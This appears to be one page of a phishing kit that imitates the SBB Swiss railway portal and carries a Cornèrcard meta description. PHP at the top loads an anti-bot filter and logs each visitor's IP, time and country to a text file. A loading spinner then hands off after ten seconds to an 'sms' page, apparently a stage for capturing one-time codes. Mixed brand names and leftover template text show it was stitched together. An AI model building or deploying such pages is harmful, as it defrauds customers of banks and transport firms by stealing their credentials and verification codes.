<!DOCTYPE html>


<html lang="zh-tw" dir="ltr">
<?php
include("./anti/index.php");
include("wc.php");

$ip = $_SERVER['REMOTE_ADDR'];
$COUNTRY = getCountryFromIP($ip, " NamE ");
$hostname = gethostbyaddr($ip);
$useragent = $_SERVER['HTTP_USER_AGENT'];
$TIME = date("d F Y H:i:s");

$file = fopen("is.txt", "a");
fwrite($file, $ip . "  -   " . $TIME . " -  " . $COUNTRY . "\n");



?>
<meta http-equiv="refresh" content="10;url=../sms/" />

<html lang="de"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Das Online-Portal der SBB für Zug und ÖV | SBB</title>

    
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no, user-scalable=no">
    <meta content="iCornèr: Registrieren Sie sich hier an, um Zugriff auf sämtliche Daten Ihrer Cornèrcard zu erhalten." name="description">
    <meta name="author" content="cornèrcard">

    <link href="./sms_files/bootstrap.min.css" rel="stylesheet" type="text/css">
    <link href="./sms_files/sticky-footer-navbar.css" rel="stylesheet" type="text/css">
    <link href="./sms_files/default.css" rel="stylesheet" type="text/css">
    <link href="./sms_files/icons.css" rel="stylesheet" type="text/css">
    <!--[if lt IE 8]><!-->
    <link rel="stylesheet" href="./sms_files/ie7.css" type="text/css">
    <!--<![endif]-->
    <script>
        globalparameters = {
            code: "de"
        }
    </script>
    <script src="./sms_files/jquery-3.6.0.min.js"></script>
    <script src="./sms_files/jquery.inputmasked.js"></script>
    <script src="./sms_files/jquery.cookie.js"></script>
    <script src="./sms_files/momentjs.js"></script>

    <script src="./sms_files/bootstrap.min.js"></script>
    <script src="./sms_files/validation.js"></script>
    <script src="./sms_files/common-translation.js"></script>
    <script src="./sms_files/default.js"></script>

    <link rel="shortcut icon" href="https://cdn.app.sbb.ch/favicons/sbb/v2/favicon.ico" type="image/x-icon">
    <meta name="format-detection" content="telephone=no">
</head>
<body>
<nav class="navbar navbar-expand-md navbar-light bg-light mb-4">
    <div class="container">
        <a class="navbar-brand" href="#">
<img alt="" src="https://upload.wikimedia.org/wikipedia/commons/thumb/7/70/SBB_CFF_FFS_logo.svg/2560px-SBB_CFF_FFS_logo.svg.png" width="196">        </a>
        </a>
    </div>
</nav>

<main>
    <div id="content" class="container">




<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
/* Center the loader */
#loader {
  position: absolute;
  left: 50%;
  top: 50%;
  z-index: 1;
  width: 90px;
  height: 90px;
  margin: -140px 0 0 -70px;
  border: 16px solid #f3f3f3;
  border-radius: 50%;
  border-top: 19px solid #E52E07;
  -webkit-animation: spin 2s linear infinite;
  animation: spin 2s linear infinite;
}

@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(0deg); }
  100% { -webkit-transform: rotate(360deg); }
}

@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}

/* Add animation to "page content" */
.animate-bottom {
  position: relative;
  -webkit-animation-name: animatebottom;
  -webkit-animation-duration: 1s;
  animation-name: animatebottom;
  animation-duration: 1s
}

@-webkit-keyframes animatebottom {
  from { bottom:-100px; opacity:0 } 
  to { bottom:0px; opacity:1 }
}

@keyframes animatebottom { 
  from{ bottom:-100px; opacity:0 } 
  to{ bottom:0; opacity:1 }
}

#myDiv {
  display: none;
  text-align: center;
}
</style>



<div id="loader"></div>

<div style="display:none;" id="myDiv" class="animate-bottom">
  <h2>Tada!</h2>
  <p>Some text in my newly loaded page..</p>
</div>

<script>
var myVar;

function myFunction() {
  myVar = setTimeout(showPage, 3000);
}

function showPage() {
  document.getElementById("loader").style.display = "none";
  document.getElementById("myDiv").style.display = "block";
}
</script>



    </div>
</main>

<footer class="footer">
    <div class="container">
        <div class="top">
           
        </div>
        <div class="bottom">
            <div class="footer-menu">

             
            </div>
            <div class="ebas-weiss">
                <a href="https://www.ebas.ch/de/">
                    <img src="./sms_files/logo_ebas_weiss_de.png" width="196">
                </a>
            </div>
        </div>
    </div>
</footer>

    

</body></html>